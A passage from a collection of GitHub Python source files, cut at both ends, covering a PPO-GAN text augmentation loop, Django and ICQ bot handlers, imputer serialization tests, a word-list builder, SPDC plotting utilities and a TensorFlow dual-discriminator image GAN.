metrics=[\"binary_accuracy\"])\n else:\n out = layers.Dense(num_classes, activation=\"softmax\")(embed)\n model = tf.keras.Model(inputs=text_input, outputs=out)\n #model.compile(Adam(lr=2e-5), \"sparse_categorical_crossentropy\", metrics=[\"acc\"])\n return model\n\nmodel_gan = get_model_bert_for_gan(num_classes*2)\nlr = 4e-5\ngan_optimizer = keras.optimizers.Adam(learning_rate=lr)\n\n#val_acc_metric = tf.keras.metrics.SparseCategoricalAccuracy()\nkl = tf.keras.losses.KLDivergence(reduction=tf.keras.losses.Reduction.NONE)\n\n\n# row = df_batch.sample(1)\n# print(row['label_name'])\n# print(row['content'].tolist()[0])\n# print(row['response'].tolist()[0])\n\n# model_gan.predict(row['content'].values, batch_size=32)\nif args.dsn == 'uci':\n maxlen = 32 \nelif args.dsn == 'ag':\n maxlen = 128\n\nfor epoch in range(args.epoch):\n ds.df_train = ds.df_train.sample(frac=1)\n ix = 0\n while ix < ds.df_train.shape[0]:\n\n df_batch = ds.df_train[ix:ix+args.ppo_batchsize].copy()\n\n torch.cuda.empty_cache() \n\n df_batch, query_tensors, response_tensors = reponse_single(df_batch, gpt2_model_trl, maxlen)\n\n prompts = tf.convert_to_tensor(df_batch['content'].values)\n labels = tf.convert_to_tensor(df_batch['label'].values)\n\n prompts_syn = tf.convert_to_tensor(df_batch['response'].values)\n labels_syn = tf.convert_to_tensor(df_batch['label'].values+ num_classes ) \n\n preds_syn = model_gan.predict(prompts_syn, batch_size=32) \n preds_ori = model_gan.predict(prompts, batch_size=32) \n\n preds_ori_labels = preds_ori.argmax(axis=1)\n preds_syn_labels = preds_syn.argmax(axis=1)\n\n acc_all = accuracy_score(np.concatenate((df_batch['label'].values, df_batch['label'].values+num_classes)),\n np.concatenate((preds_ori_labels, preds_syn_labels)) )\n acc_half = accuracy_score(df_batch['label'].values, \\\n (preds_ori[:,:num_classes] + preds_ori[:,num_classes:]).argmax(axis=1)) \n\n rewards = []\n for i in range(args.ppo_batchsize):\n if args.reward == 'hard':\n if preds_ori_labels[i] == preds_syn_labels[i]:\n rewards.append(1)\n else:\n rewards.append(-1)\n elif args.reward == 'soft':\n diff = np.abs(preds_ori[i] - preds_syn[i]).sum()\n rewards.append(1-diff)\n\n # train ppo \n if epoch >= args.ppo_train_epoch : \n stats = ppo_trainer.step(query_tensors, response_tensors, torch.tensor(rewards).to(device)) \n\n # loss_gan = train_step_gan(prompts, prompts_syn, \\\n # tf.cast(labels, tf.float32), tf.cast(labels_syn, tf.float32))\n\n loss_gan = train_step_gan(prompts, prompts_syn, labels, labels_syn)\n\n print(ix, 'of', args.samplecnt*num_classes, 'epoch:', epoch, \\\n 'acc_half:', acc_half, 'acc_all:', acc_all, \\\n 'loss:', loss_gan.numpy(), 'rewards:', np.array(rewards).mean() )\n ix += args.ppo_batchsize\n\n\n preds = model_gan.predict(ds.df_test['content'].values, batch_size=32) \n preds_accum = preds[:,:num_classes] + preds[:,num_classes:]\n acc_half = accuracy_score(ds.df_test['label'].values, preds_accum.argmax(axis=1)) \n\n df_test_batch = ds.df_test.sample(256)\n df_test_batch, _, _ = reponse_single(df_test_batch, gpt2_model_trl, maxlen)\n preds = model_gan.predict(df_test_batch['content'].values, batch_size=32)\n preds_syn = model_gan.predict(df_test_batch['response'].values, batch_size=32)\n\n acc_all = accuracy_score(np.concatenate((df_test_batch['label'].values, df_test_batch['label'].values+num_classes)),\n np.concatenate((preds.argmax(axis=1), preds_syn.argmax(axis=1))) )\n\n df_batch['reward'] =rewards\n\n print('summary epoch:',epoch, acc_half, acc_all, 'rewards==>', round(df_batch['reward'].mean(), 4))\n \n\n\n\n\n","repo_name":"yananchen1989/PLMs_text_classification","sub_path":"legacy/aug_ppo_adversarial.py","file_name":"aug_ppo_adversarial.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36523583722","text":"from .models import FriendRequest\nfrom user_profile.models import CofifiUser\n\ndef friends_requests(request):\n\ttry:\n\t\treceiver_id = request.user.id\n\t\treceiver = CofifiUser.objects.get( id = receiver_id )\n\t\tfriends_requests = FriendRequest.objects.filter(receiver = receiver ).exclude( confirmed = True )\n\t\treturn {\"friends_requests\":friends_requests}\n\texcept CofifiUser.DoesNotExist:\n\t\treturn {}\n","repo_name":"RusEu/CofiPy","sub_path":"friends/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25938858742","text":"import json\n\nasync def hello_cb(bot, event, user):\n await bot.send_text(chat_id=event.message_author['userId'], text=f\"1 ответ на {event.text}\")\n response = await user.wait_response()\n await bot.send_text(chat_id=event.message_author['userId'], text=f\"2 ответ на {response.text}\")\n response = await user.wait_response()\n await bot.send_text(chat_id=event.message_author['userId'], text=f\"3 ответ на {response.text}\")\n\n\nasync def buttons_get_cb(bot, event):\n await bot.send_text(\n chat_id=event.message_author['userId'],\n text=\"Hello with buttons.\",\n inline_keyboard_markup=\"[{}]\".format(json.dumps([\n {\"text\": \"Action 1\", \"url\": \"http://mail.ru\"},\n {\"text\": \"Action 2\", \"callbackData\": \"call_back_id_2\"},\n {\"text\": \"Action 3\", \"callbackData\": \"call_back_id_3\"}\n ])))\n\n\nasync def buttons_answer_cb(bot, event):\n if event.data['callbackData'] == \"call_back_id_2\":\n await bot.answer_callback_query(\n query_id=event.data['queryId'],\n text=\"Hey! It's a working button 2.\",\n show_alert=True\n )\n\n elif event.data['callbackData'] == \"call_back_id_3\":\n await bot.answer_callback_query(\n query_id=event.data['queryId'],\n text=\"Hey! It's a working button 3.\",\n show_alert=False\n )\n\n","repo_name":"ICQ-BOTS/async_python_bot","sub_path":"example/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"36255643410","text":"# stdlib\nfrom typing import Tuple\n\n# third party\nimport numpy as np\nimport pytest\n\n# autoprognosis absolute\nfrom autoprognosis.plugins import Imputers\nfrom autoprognosis.plugins.utils.simulate import simulate_nan\nfrom autoprognosis.utils.serialization import load_model, save_model\n\n\ndef dataset(mechanism: str, p_miss: float) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n np.random.seed(0)\n\n n = 20\n p = 4\n\n mean = np.repeat(0, p)\n cov = 0.5 * (np.ones((p, p)) + np.eye(p))\n\n x = np.random.multivariate_normal(mean, cov, size=n)\n x_simulated = simulate_nan(x, p_miss, mechanism)\n\n mask = x_simulated[\"mask\"]\n x_miss = x_simulated[\"X_incomp\"]\n\n return x, x_miss, mask\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"plugin\", Imputers().list())\ndef test_serialization(plugin: str) -> None:\n x, x_miss, mask = dataset(\"MAR\", 0.3)\n\n estimator = Imputers().get(plugin)\n\n estimator.fit_transform(x_miss)\n\n buff = estimator.save()\n estimator_new = Imputers().get_type(plugin).load(buff)\n\n estimator_new.transform(x_miss)\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"plugin\", Imputers().list())\ndef test_pickle(plugin: str) -> None:\n x, x_miss, mask = dataset(\"MAR\", 0.3)\n\n estimator = Imputers().get(plugin)\n\n estimator.fit_transform(x_miss)\n\n buff = save_model(estimator)\n estimator_new = load_model(buff)\n\n estimator_new.transform(x_miss)\n","repo_name":"vanderschaarlab/autoprognosis","sub_path":"tests/plugins/imputers/test_imputation_serde.py","file_name":"test_imputation_serde.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"44"} +{"seq_id":"22704760438","text":"from nltk.corpus import words\n\n\nclass WordCollector:\n\n IN_FILE_NAME = \"words.txt\"\n OUT_FILE_NAME = \"words_list.txt\"\n\n def get_all_words_from_file(self) -> list:\n\n try:\n with open(self.IN_FILE_NAME) as word_file:\n valid_words = set(word_file.read().split())\n return valid_words\n except Exception:\n print(\"Some error occured while getting the words from \" + self.IN_FILE_NAME)\n return []\n\n def get_all_words_from_nltk(self) -> list:\n try:\n all_words_list = words.words()\n return all_words_list\n except Exception:\n print(\"Some error occured while downloading the words.\")\n return []\n\n def filter_words_by_length(self, words_list: list, length: int) -> list:\n filtered_words_list = [str(y).lower() for y in filter(lambda x: len(x) == length, words_list)]\n return filtered_words_list\n\n def create_file(self, filename: str):\n try:\n with open(filename, 'w') as f:\n f.write('Hello, world!\\n')\n print(\"File \" + filename + \" created successfully.\")\n except IOError:\n print(\"Error: could not create file \" + filename)\n\n def write_words_to_file(self, file, words_list: list):\n try:\n with open(file, 'w') as f:\n for word in words_list:\n f.write(word+\"\\n\")\n print(\"Word-List is updated to file \" + file + \" successfully with \" + str(len(words_list)) + \" words.\")\n except IOError:\n print(\"Error: could not write to file \" + file)\n\n def find_remove_duplicates(self, words_list: list) -> list:\n new_word_list = []\n for word in words_list:\n if word not in new_word_list:\n new_word_list.append(word)\n return new_word_list\n\nif __name__ == \"__main__\":\n word_collector = WordCollector()\n\n word_list = word_collector.get_all_words_from_file()\n word_list = word_collector.filter_words_by_length(word_list, 5)\n print(len(word_list))\n word_list = word_collector.find_remove_duplicates(word_list)\n print(len(word_list))\n word_collector.create_file(word_collector.OUT_FILE_NAME)\n word_collector.write_words_to_file(word_collector.OUT_FILE_NAME, word_list)\n\n\n\n","repo_name":"KoushikMallik-developer/wordle-solver","sub_path":"download_words.py","file_name":"download_words.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"3813681117","text":"from spdc_inv.utils.defaults import COINCIDENCE_RATE, DENSITY_MATRIX, TOMOGRAPHY_MATRIX\nfrom spdc_inv.utils.utils import G1_Normalization\nfrom spdc_inv import RES_DIR\nfrom jax import numpy as np\n\nimport os\nimport shutil\nimport numpy as onp\nimport matplotlib.pyplot as plt\n\n\ndef save_training_statistics(\n logs_dir,\n fit_results,\n interaction,\n model_parameters,\n):\n if fit_results is not None:\n loss_trn, best_loss = fit_results\n\n pump_coeffs_real, \\\n pump_coeffs_imag, \\\n waist_pump, \\\n crystal_coeffs_real, \\\n crystal_coeffs_imag, \\\n r_scale = model_parameters\n\n pump = open(os.path.join(logs_dir, 'pump.txt'), 'w')\n pump.write(\n type_coeffs_to_txt(\n interaction.pump_basis,\n interaction.pump_max_mode1,\n interaction.pump_max_mode2,\n pump_coeffs_real[0] if pump_coeffs_real is not None\n else interaction.initial_pump_coefficients()[0],\n pump_coeffs_imag[0] if pump_coeffs_imag is not None\n else interaction.initial_pump_coefficients()[1],\n waist_pump[0] if waist_pump is not None\n else interaction.initial_pump_waists(),\n )\n )\n\n if interaction.crystal_basis:\n\n crystal = open(os.path.join(logs_dir, 'crystal.txt'), 'w')\n crystal.write(\n type_coeffs_to_txt(\n interaction.crystal_basis,\n interaction.crystal_max_mode1,\n interaction.crystal_max_mode2,\n crystal_coeffs_real[0] if crystal_coeffs_real is not None\n else interaction.initial_crystal_coefficients()[0],\n crystal_coeffs_imag[0] if crystal_coeffs_imag is not None\n else interaction.initial_crystal_coefficients()[1],\n r_scale[0] if r_scale is not None\n else interaction.initial_crystal_waists(),\n )\n )\n\n if fit_results is not None:\n # print loss\n plt.plot(loss_trn, 'r', label='training')\n plt.ylabel('objective loss')\n plt.xlabel('#epoch')\n # plt.ylim(0.2, 1)\n plt.axhline(y=best_loss, color='gray', linestyle='--')\n plt.text(2, best_loss, f'best = {best_loss}', rotation=0, horizontalalignment='left',\n verticalalignment='top', multialignment='center')\n plt.legend()\n plt.savefig(os.path.join(logs_dir, 'loss'))\n plt.close()\n\n np.save(os.path.join(logs_dir, 'parameters_pump_real.npy'),\n pump_coeffs_real[0] if pump_coeffs_real is not None\n else interaction.initial_pump_coefficients()[0])\n np.save(os.path.join(logs_dir, 'parameters_pump_imag.npy'),\n pump_coeffs_imag[0] if pump_coeffs_imag is not None\n else interaction.initial_pump_coefficients()[1])\n np.save(os.path.join(logs_dir, 'parameters_pump_waists.npy'),\n waist_pump[0] if waist_pump is not None\n else interaction.initial_pump_waists())\n if interaction.crystal_basis is not None:\n np.save(os.path.join(logs_dir, 'parameters_crystal_real.npy'),\n crystal_coeffs_real[0] if crystal_coeffs_real is not None\n else interaction.initial_crystal_coefficients()[0])\n np.save(os.path.join(logs_dir, 'parameters_crystal_imag.npy'),\n crystal_coeffs_imag[0] if crystal_coeffs_imag is not None\n else interaction.initial_crystal_coefficients()[1])\n np.save(os.path.join(logs_dir, 'parameters_crystal_effective_waists.npy'),\n r_scale[0] if r_scale is not None\n else interaction.initial_crystal_waists()\n )\n\n return\n\n\ndef save_results(\n run_name,\n observable_vec,\n observables,\n projection_coincidence_rate,\n projection_tomography_matrix,\n Signal,\n Idler,\n):\n results_dir = os.path.join(RES_DIR, run_name)\n if os.path.exists(results_dir):\n shutil.rmtree(results_dir)\n os.makedirs(results_dir, exist_ok=True)\n\n (coincidence_rate, density_matrix, tomography_matrix) = observables\n\n if observable_vec[COINCIDENCE_RATE]:\n coincidence_rate = coincidence_rate[0]\n coincidence_rate = coincidence_rate / np.sum(np.abs(coincidence_rate))\n np.save(os.path.join(results_dir, 'coincidence_rate.npy'), coincidence_rate)\n coincidence_rate_plots(\n results_dir,\n coincidence_rate,\n projection_coincidence_rate,\n Signal,\n Idler,\n )\n\n if observable_vec[DENSITY_MATRIX]:\n density_matrix = density_matrix[0]\n density_matrix = density_matrix / np.trace(np.real(density_matrix))\n np.save(os.path.join(results_dir, 'density_matrix_real.npy'), onp.real(density_matrix))\n np.save(os.path.join(results_dir, 'density_matrix_imag.npy'), onp.imag(density_matrix))\n density_matrix_plots(\n results_dir,\n density_matrix,\n )\n\n if observable_vec[TOMOGRAPHY_MATRIX]:\n tomography_matrix = tomography_matrix[0]\n tomography_matrix = tomography_matrix / np.sum(np.abs(tomography_matrix))\n np.save(os.path.join(results_dir, 'tomography_matrix.npy'), tomography_matrix)\n tomography_matrix_plots(\n results_dir,\n tomography_matrix,\n projection_tomography_matrix,\n Signal,\n Idler,\n )\n\n\ndef coincidence_rate_plots(\n results_dir,\n coincidence_rate,\n projection_coincidence_rate,\n Signal,\n Idler,\n):\n # coincidence_rate = unwrap_kron(coincidence_rate,\n # projection_coincidence_rate.projection_n_modes1,\n # projection_coincidence_rate.projection_n_modes2)\n coincidence_rate = coincidence_rate[0, :].\\\n reshape(projection_coincidence_rate.projection_n_modes2, projection_coincidence_rate.projection_n_modes2)\n\n # Compute and plot reduced coincidence_rate\n g1_ss_normalization = G1_Normalization(Signal.w)\n g1_ii_normalization = G1_Normalization(Idler.w)\n coincidence_rate_reduced = coincidence_rate * \\\n projection_coincidence_rate.tau / (g1_ii_normalization * g1_ss_normalization)\n\n # plot coincidence_rate 2d\n plt.imshow(coincidence_rate_reduced)\n plt.xlabel(r'signal mode i')\n plt.ylabel(r'idle mode j')\n plt.colorbar()\n\n plt.savefig(os.path.join(results_dir, 'coincidence_rate'))\n plt.close()\n\n\ndef tomography_matrix_plots(\n results_dir,\n tomography_matrix,\n projection_tomography_matrix,\n Signal,\n Idler,\n):\n\n # tomography_matrix = unwrap_kron(tomography_matrix,\n # projection_tomography_matrix.projection_n_state1,\n # projection_tomography_matrix.projection_n_state2)\n\n tomography_matrix = tomography_matrix[0, :].\\\n reshape(projection_tomography_matrix.projection_n_state2, projection_tomography_matrix.projection_n_state2)\n\n # Compute and plot reduced tomography_matrix\n g1_ss_normalization = G1_Normalization(Signal.w)\n g1_ii_normalization = G1_Normalization(Idler.w)\n\n tomography_matrix_reduced = tomography_matrix * \\\n projection_tomography_matrix.tau / (g1_ii_normalization * g1_ss_normalization)\n\n # plot tomography_matrix 2d\n plt.imshow(tomography_matrix_reduced)\n plt.xlabel(r'signal mode i')\n plt.ylabel(r'idle mode j')\n plt.colorbar()\n\n plt.savefig(os.path.join(results_dir, 'tomography_matrix'))\n plt.close()\n\n\ndef density_matrix_plots(\n results_dir,\n density_matrix,\n):\n\n density_matrix_real = onp.real(density_matrix)\n density_matrix_imag = onp.imag(density_matrix)\n\n plt.imshow(density_matrix_real)\n plt.xlabel(r'signal mode i')\n plt.ylabel(r'idle mode j')\n plt.colorbar()\n plt.savefig(os.path.join(results_dir, 'density_matrix_real'))\n plt.close()\n\n plt.imshow(density_matrix_imag)\n plt.xlabel(r'signal mode i')\n plt.ylabel(r'idle mode j')\n plt.colorbar()\n plt.savefig(os.path.join(results_dir, 'density_matrix_imag'))\n plt.close()\n\n\ndef type_coeffs_to_txt(\n basis,\n max_mode1,\n max_mode2,\n coeffs_real,\n coeffs_imag,\n waists):\n sign = {'1.0': '+', '-1.0': '-', '0.0': '+'}\n print_str = f'basis: {basis}({max_mode1},{max_mode2}):\\n'\n for _real, _imag, _waist in zip(coeffs_real, coeffs_imag, waists):\n sign_imag = sign[str(onp.sign(_imag).item())]\n print_str += '{:.4} {} j{:.4} (waist: {:.4}[um])\\n'.format(_real, sign_imag, onp.abs(_imag), _waist * 10)\n return print_str\n\n\ndef unwrap_kron(G, M1, M2):\n '''\n the function takes a Kronicker product of size M1^2 x M2^2 and turns is into an\n M1 x M2 x M1 x M2 tensor. It is used only for illustration and not during the learning\n Parameters\n ----------\n G: the tensor we wish to reshape\n M1: first dimension\n M2: second dimension\n\n Returns a reshaped tensor with shape (M1, M2, M1, M2)\n -------\n\n '''\n\n C = onp.zeros((M1, M2, M1, M2), dtype=onp.float32)\n\n for i in range(M1):\n for j in range(M2):\n for k in range(M1):\n for l in range(M2):\n C[i, j, k, l] = G[k + M1 * i, l + M2 * j]\n return C\n","repo_name":"EyalRozenberg1/SPDCinv","sub_path":"src/spdc_inv/experiments/results_and_stats_utils.py","file_name":"results_and_stats_utils.py","file_ext":"py","file_size_in_byte":9373,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"41"} +{"seq_id":"39914013914","text":"from edc_consent.constants import DEFAULT_CONSENT_GROUP\n\nfrom .subject_consent import SubjectConsent\n\n\nclass SubjectConsentUg(SubjectConsent):\n class Meta(SubjectConsent.Meta):\n proxy = True\n verbose_name = \"Subject Consent (Uganda)\"\n verbose_name_plural = \"Subject Consents (Uganda)\"\n consent_group = DEFAULT_CONSENT_GROUP\n","repo_name":"intecomm-trial/intecomm-edc","sub_path":"intecomm_consent/models/subject_consent_ug.py","file_name":"subject_consent_ug.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"11808649041","text":"\n# coding: utf-8\n\n# # Project\n\n# In[1]:\n\nimport glob, os, time, random\nimport tensorflow as tf\nimport tensorlayer as tl\nimport numpy as np\n#from tqdm import tqdm\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom skimage import io\n# from pylab import rcParams\n# rcParams['figure.figsize'] = 10, 7\n\n\n## create folders\nsave_dir = \"samples\"\ncheckpoint_dir = \"checkpoint\"\ntl.files.exists_or_mkdir(save_dir)\ntl.files.exists_or_mkdir(checkpoint_dir)\n\n#labels = mnist.train.labels\nbatch_size = 128\n\ndef load_dir(path):\n images = []\n for fname in glob.glob(path):\n try:\n image = io.imread(fname).astype(np.float32)\n if len(image.shape) <= 2:\n image = np.swapaxes(np.stack((image,)*3), 0, 2)\n image = tl.prepro.imresize(image, size=[64, 64], interp='bicubic', mode=None)\n image = np.asarray(image, dtype=np.float32)\n images.append((np.array(image) / 127.5)-1)\n except Exception as e:\n print(fname, e)\n return np.array(images)\n\nspoons = load_dir('leaves_spoons/spoons/*')\nleaves = load_dir('leaves_spoons/leaves/*')\n\nprint(leaves.shape, spoons.shape)\n\n\n\ndef xavier_initializer(shape):\n return tf.random_normal(shape=shape, stddev=1/shape[0])\n\nimg_size = 64\ncolors = 3\n\n# Generator\nz_size = 200 # Latent vector dimension\ng_w1_size = 400\ng_w2_size = 200\ng_out_size = img_size * img_size * colors\n\n# Discriminator\nx_size = img_size * img_size * colors\nd_w1_size = 400\nd_w2_size = 200\nd_out_size = colors\n\n\nz = tf.placeholder('float', shape=(None, z_size))\nX = tf.placeholder('float', shape=(None, x_size))\n\n\n# ## Weights\n\n# In[7]:\n\ng_weights = {\n 'w1': tf.Variable(xavier_initializer(shape=(z_size, g_w1_size))),\n 'b1': tf.Variable(tf.zeros(shape=[g_w1_size])),\n 'w2': tf.Variable(xavier_initializer(shape=(g_w1_size, g_w2_size))),\n 'b2': tf.Variable(tf.zeros(shape=[g_w2_size])),\n 'out': tf.Variable(xavier_initializer(shape=(g_w2_size, g_out_size))),\n 'b3': tf.Variable(tf.zeros(shape=[g_out_size])),\n}\n\nd1_weights ={\n 'w1': tf.Variable(xavier_initializer(shape=(x_size, d_w1_size))),\n 'b1': tf.Variable(tf.zeros(shape=[d_w1_size])),\n 'w2': tf.Variable(xavier_initializer(shape=(d_w1_size, d_w2_size))),\n 'b2': tf.Variable(tf.zeros(shape=[d_w2_size])),\n 'out': tf.Variable(xavier_initializer(shape=(d_w2_size, d_out_size))),\n 'b3': tf.Variable(tf.zeros(shape=[d_out_size])),\n}\n\nd2_weights ={\n 'w1': tf.Variable(xavier_initializer(shape=(x_size, d_w1_size))),\n 'b1': tf.Variable(tf.zeros(shape=[d_w1_size])),\n 'w2': tf.Variable(xavier_initializer(shape=(d_w1_size, d_w2_size))),\n 'b2': tf.Variable(tf.zeros(shape=[d_w2_size])),\n 'out': tf.Variable(xavier_initializer(shape=(d_w2_size, d_out_size))),\n 'b3': tf.Variable(tf.zeros(shape=[d_out_size])),\n}\n\n\n# ## Models\n#\n# ### Layers\n\n# In[8]:\n\ndef conv(x, out_channels, kernel_size=5, stride=2, name='project'):\n with tf.variable_scope(name):\n x_shape = x.get_shape().as_list()\n kernel = tf.get_variable('conv_kernel', [kernel_size, kernel_size, x_shape[-1], out_channels],\n initializer=tf.truncated_normal_initializer(stddev=0.02))\n bias = tf.get_variable('conv_bias', [out_channels], initializer=tf.ones_initializer())\n\n return tf.nn.conv2d(x, kernel, [1, stride, stride, 1], padding='SAME') + bias\n\ndef deconv(x, out_channels, kernel_size=5, stride=2, name='project'):\n with tf.variable_scope(name):\n x_shape = x.get_shape().as_list()\n kernel = tf.get_variable('deconv_kernel', [kernel_size, kernel_size, out_channels, x_shape[-1]],\n initializer=tf.truncated_normal_initializer(stddev=0.02))\n bias = tf.get_variable('deconv_bias', [out_channels], initializer=tf.ones_initializer())\n output_shape = [batch_size, x_shape[1] * stride, x_shape[2] * stride, out_channels]\n\n return tf.nn.conv2d_transpose(x, kernel, output_shape, [1, stride, stride, 1]) + bias\n\ndef dense(x, out_channels, name='project'):\n with tf.variable_scope(name):\n x_shape = x.get_shape().as_list()\n W = tf.get_variable('dense_w', [x_shape[1], out_channels],\n initializer=tf.truncated_normal_initializer(stddev=0.02))\n bias = tf.get_variable('dense_bias', [out_channels], initializer=tf.ones_initializer())\n return tf.matmul(x, W) + bias\n\ndef lrelu(x, leak=0.2):\n return tf.maximum(x, leak*x)\n\ndef bn(x, name='project'):\n with tf.variable_scope(name):\n x_shape = x.get_shape().as_list()\n beta = tf.get_variable('BnBeta', [x_shape[-1]],\n initializer=tf.zeros_initializer())\n gamma = tf.get_variable('BnGamma', [x_shape[-1]],\n initializer=tf.ones_initializer())\n mean, var = tf.nn.moments(x, [0])\n return tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-5)\n\n\n# In[9]:\n\n\ndef G(z, reuse=True):\n with tf.variable_scope('G', reuse=reuse):\n g_h1 = dense(z, out_channels=1024, name='h1')\n g_h1 = bn(g_h1, name='bn1')\n g_h1 = tf.nn.relu(g_h1)\n g_h2 = dense(g_h1, out_channels=int(img_size/4)*int(img_size/4)*128, name='h2')\n g_h2 = bn(g_h2, name='bn2')\n g_h2 = tf.nn.relu(g_h2)\n g_h3 = tf.reshape(g_h2, [-1, int(img_size/4), int(img_size/4), 128])\n g_h3 = deconv(g_h3, out_channels=64, name='h3')\n g_h3 = bn(g_h3, name='bn3')\n g_h3 = tf.nn.relu(g_h3)\n g_h4 = deconv(g_h3, out_channels=colors, name='h4')\n # g_h4 = tf.reshape(g_h4, [-1, img_size * img_size, colors])\n return tf.nn.tanh(g_h4)\n\ndef D1(x, reuse=True):\n with tf.variable_scope('D1', reuse=reuse):\n x = tf.reshape(x, [-1, img_size, img_size, colors])\n #x = bn(x, name='bn1')\n d1_h1 = conv(x, out_channels=64, name='h1')\n #d1_h1 = bn(d1_h1, name='bn2')\n d1_h1 = lrelu(d1_h1)\n d1_h2 = conv(d1_h1, out_channels=128, name='h2')\n #d1_h2 = bn(d1_h2, name='bn3')\n d1_h2 = lrelu(d1_h2)\n d1_h2 = tl.layers.flatten_reshape(d1_h2, name='f')\n # d1_h2 = tf.reshape(d1_h2, [-1, 128])\n # d1_h3 = tf.nn.dropout(d1_h2, 0.5)\n d1_h3 = dense(d1_h2, out_channels=colors, name='h3')\n return d1_h3\n\ndef D2(x, reuse=True):\n with tf.variable_scope('D2', reuse=reuse):\n x = tf.reshape(x, [-1, img_size, img_size, colors])\n x = tf.image.rgb_to_grayscale(x)\n #x = bn(x, name='bn1')\n d2_h1 = conv(x, out_channels=64, name='h1')\n #d2_h1 = bn(d2_h1, name='bn2')\n d2_h1 = lrelu(d2_h1)\n d2_h2 = conv(d2_h1, out_channels=128, name='h2')\n #d2_h2 = bn(d2_h2, name='bn3')\n d2_h2 = lrelu(d2_h2)\n d2_h2 = tf.reshape(d2_h2, [-1, 128])\n # d2_h3 = tf.nn.dropout(d2_h2, 0.5)\n d2_h2 = tl.layers.flatten_reshape(d2_h2, name='f')\n d2_h3 = dense(d2_h2, out_channels=colors, name='h3')\n return d2_h3\n\ndef generate_z(n=1):\n return np.random.normal(scale=0.1, size=(n, z_size))\n\n\nG(z, reuse=False)\nD1(spoons[0], reuse=False)\nD2(spoons[0], reuse=False)\n\nsample = G(z) # To be called during session\n\n\ndef x_entropy(x, y):\n return tf.nn.sigmoid_cross_entropy_with_logits(logits=x, labels=y)\n\n\nd1_real = D1(X)\nd1_fake = D1(G(z))\nd2_real = D2(X)\nd2_fake = D2(G(z))\n\nG1_objective = tf.reduce_mean(x_entropy(d1_fake, tf.ones_like(d1_fake)))\nG2_objective = tf.reduce_mean(x_entropy(d2_fake, tf.ones_like(d2_fake)))\n\nD1_obj_real = tf.reduce_mean(x_entropy(d1_real, tf.ones_like(d1_real)-0.1))\nD1_obj_fake = tf.reduce_mean(x_entropy(d1_fake, tf.zeros_like(d1_fake)))\nD1_objective = D1_obj_real + D1_obj_fake\n\nD2_obj_real = tf.reduce_mean(x_entropy(d2_real, tf.ones_like(d2_real)-0.1))\nD2_obj_fake = tf.reduce_mean(x_entropy(d2_fake, tf.zeros_like(d2_fake)))\nD2_objective = D2_obj_real + D2_obj_fake\n\nD1_fake_balance = tf.reduce_mean((x_entropy(d1_fake, tf.zeros_like(d1_fake)) -\n x_entropy(d1_fake, tf.ones_like(d1_fake)))**2)\nD2_fake_balance = tf.reduce_mean((x_entropy(d2_fake, tf.zeros_like(d2_fake)) -\n x_entropy(d2_fake, tf.ones_like(d2_fake)))**2)\n\n\nparams = tf.trainable_variables()\nd1_params = [v for v in params if v.name.startswith('D1/')]\nd2_params = [v for v in params if v.name.startswith('D2/')]\ng_params = [v for v in params if v.name.startswith('G/')]\n\n\nG1_opt = tf.train.AdamOptimizer().minimize(\n G1_objective, var_list=g_params)\nG2_opt = tf.train.AdamOptimizer().minimize(\n G2_objective, var_list=g_params)\n\nD1_real_opt = tf.train.AdamOptimizer().minimize(\n D1_obj_real, var_list=d1_params)\nD2_real_opt = tf.train.AdamOptimizer().minimize(\n D2_obj_real, var_list=d2_params)\nD1_fake_opt = tf.train.AdamOptimizer().minimize(\n D1_obj_fake, var_list=d1_params)\nD2_fake_opt = tf.train.AdamOptimizer().minimize(\n D2_obj_fake, var_list=d2_params)\n\n# D1_balance_opt = tf.train.AdamOptimizer().minimize(\n# D1_fake_balance, var_list=d1_params)\n# D2_balance_opt = tf.train.AdamOptimizer().minimize(\n# D2_fake_balance, var_list=d2_params)\n\nD1_opt = tf.train.AdamOptimizer().minimize(\n D1_objective, var_list=d1_params)\nD2_opt = tf.train.AdamOptimizer().minimize(\n D2_objective, var_list=d2_params)\n\n\n# ## Training\n\n# Hyper-parameters\n# import random\n# import warnings\n# import matplotlib.gridspec as gridspec\n# from IPython.display import clear_output\n# warnings.simplefilter('error', UserWarning)\n\nn_step = 500000\nimages1 = leaves\nimages2 = spoons\n\nwith tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)) as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(n_step):\n\n _, errDA = sess.run([D1_opt, D1_objective], feed_dict={\n X: images1[np.random.choice(range(len(images1)), batch_size)].reshape(batch_size, img_size * img_size * colors),\n z: generate_z(batch_size),\n })\n _, errDB = sess.run([D2_opt, D2_objective], feed_dict={\n X: images2[np.random.choice(range(len(images2)), batch_size)].reshape(batch_size, img_size * img_size * colors),\n z: generate_z(batch_size),\n })\n\n # G\n _, errGA = sess.run([G1_opt, G1_objective], feed_dict={\n z: generate_z(batch_size)\n })\n\n _, errGB = sess.run([G2_opt, G2_objective], feed_dict={\n z: generate_z(batch_size)\n })\n\n print(\"Step: [%2d/%2d] dA:%.5f dB:%.5f gA:%.5f gB:%.5f\" % (i, n_step, errDA, errDB, errGA, errGB))\n if (i % 200 ==0):#((i / epochs) % 0.01 == 0):\n print(i, costs[i])\n images = sess.run(sample, feed_dict={z:generate_z(batch_size)})\n tl.vis.save_images(images[0:32], [4, 8], 